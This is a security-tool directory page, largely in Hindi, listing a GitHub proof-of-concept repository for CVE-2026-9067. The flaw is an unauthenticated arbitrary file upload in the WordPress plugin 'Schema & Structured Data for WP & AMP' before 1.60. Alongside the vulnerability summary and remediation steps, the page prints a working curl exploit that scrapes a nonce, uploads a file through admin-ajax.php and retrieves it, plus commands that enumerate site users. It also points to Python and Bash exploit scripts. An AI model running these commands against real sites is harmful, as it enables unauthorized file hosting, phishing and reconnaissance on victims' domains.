Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/polosss/by-poloss..-..cve-2026-9067
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubpolosss/by-poloss..-..cve-2026-9067

By-Poloss..-..CVE-2026-9067

WP और AMP के लिए स्कीमा और संरचित डेटा < 1.60 - अप्रमाणित मनमाना मीडिया अपलोड [POC और Xploit]

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
3113 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

POC & Xploit - प्रूफ ऑफ कॉन्सेप्ट निर्देशिका

वर्डप्रेस सुरक्षा परीक्षण वातावरण में पाए गए कमजोरियों के लिए दस्तावेज़ीकरण और शोषण।


कमजोरियों की सूची

CVE आईडीप्लगइनगंभीरताप्रकारस्थिति
CVE-2026-9067Schema & Structured Data for WP & AMPउच्च (8.1)अप्रतिबंधित फ़ाइल अपलोडदस्तावेज़ीकृत

CVE-2026-9067

त्वरित सारांश

क्षेत्रमान
CVE आईडीCVE-2026-9067
प्लगइनSchema & Structured Data for WP & AMP
प्रभावित संस्करण< 1.60
CWECWE-434 (खतरनाक प्रकार के साथ फ़ाइल का अप्रतिबंधित अपलोड)
CVSS v3.18.1 (उच्च)
खोजकर्ता0xBassia

कमजोरी का विवरण

प्लगइन Schema & Structured Data for WP & AMP संस्करण 1.60 से पहले फ़ाइल अपलोड के लिए AJAX हैंडलर पर उपयोगकर्ता क्षमता को मान्य नहीं करता है और अपलोड की गई फ़ाइल के प्रकार को मान्य नहीं करता है। यह गैर-प्रमाणित हमलावर को मनमानी फ़ाइल अपलोड करने की अनुमति देता है।

प्रभाव

  • सामग्री होस्टिंग: हमलावर पीड़ित के डोमेन पर दुर्भावनापूर्ण सामग्री होस्ट कर सकता है
  • डिस्क खपत: मनमानी फ़ाइल अपलोड डिस्क स्थान समाप्त कर सकता है
  • प्रतिष्ठा दुरुपयोग: पीड़ित के डोमेन से मैलवेयर, फ़िशिंग पृष्ठों का वितरण

महत्वपूर्ण नोट: WordPress कोर निष्पादन योग्य फ़ाइलों (.php, .phtml, .html, .svg) को ब्लॉक करता है, इसलिए इस कमजोरी से कोई सीधा RCE पथ नहीं है।

फ़ाइलें

CVE-2026-9067/
├── CVE-2026-9067.md       # पूर्ण दस्तावेज़ीकरण (यह फ़ाइल)
├── CVE-2026-9067.py       # मल्टी-थ्रेडिंग के साथ Python शोषण
├── CVE-2026-9067.sh       # Bash/Shell PoC स्क्रिप्ट
└── CVE-2026-9067_exploit.sh  # वैकल्पिक Bash PoC

त्वरित PoC

# Step 1: Get nonce
NONCE=$(curl -s "https://yorbit7.ddev.site/" | grep -oP 'saswp_rf_(page_)?security_nonce["\x27]?\s*:\s*["\'](https://github.com/polosss/by-poloss..-..cve-2026-9067/blob/main/%5Ba-f0-9%5D%7B10%7D)["\']' | grep -oP '[a-f0-9]{10}' | head -1)

# Step 2: Upload arbitrary file
curl -X POST 'https://yorbit7.ddev.site/wp-admin/admin-ajax.php' \
  -F 'action=saswp_rf_form_image_upload' \
  -F "saswp_rf_form_nonce=$NONCE" \
  -F '[email protected];type=image/png;filename=evil.csv'

# Step 3: Access uploaded file
curl -s "https://yorbit7.ddev.site/wp-content/uploads/$(date +%Y)/$(date +%m)/evil.csv"

पर्यावरण जानकारी

क्षेत्रमान
लक्ष्य URLhttps://yorbit7.ddev.site
PHP संस्करण8.4
डेटाबेसMariaDB 11.8
WordPress संस्करण7.0
परीक्षण विधिcurl-आधारित (ब्लैक-बॉक्स परीक्षण)

परीक्षण आदेश

साइट स्थिति जांचें

curl -s -o /dev/null -w "%{http_code}" https://yorbit7.ddev.site

प्लगइन संस्करण जांचें

curl -s https://yorbit7.ddev.site/wp-content/plugins/schema-and-structured-data-for-wp/readme.txt | grep -i "Stable tag:"

उपयोगकर्ताओं की गणना करें

curl -s https://yorbit7.ddev.site/wp-json/wp/v2/users | jq '.[] | {id, name, slug}'

सुधार

  1. प्लगइन अपग्रेड करें: Schema & Structured Data for WP & AMP को संस्करण 1.60 या उससे नए में अपडेट करें
  2. प्लगइन अक्षम करें: यदि अपग्रेड संभव नहीं है, तो प्लगइन को निष्क्रिय करें
  3. सख्तीकरण:
    • DISALLOW_FILE_MODIFICATIONS स्थिरांक सेट करें
    • .htaccess के माध्यम से अपलोड निर्देशिका में PHP निष्पादन अक्षम करें
    • WAF नियम लागू करें

संदर्भ

  • NVD CVE-2026-9067
  • WPScan Vulnerability Database
  • WordPress Plugin Page
  • मूल शोधकर्ता: 0xBassia
टूल डाउनलोड करें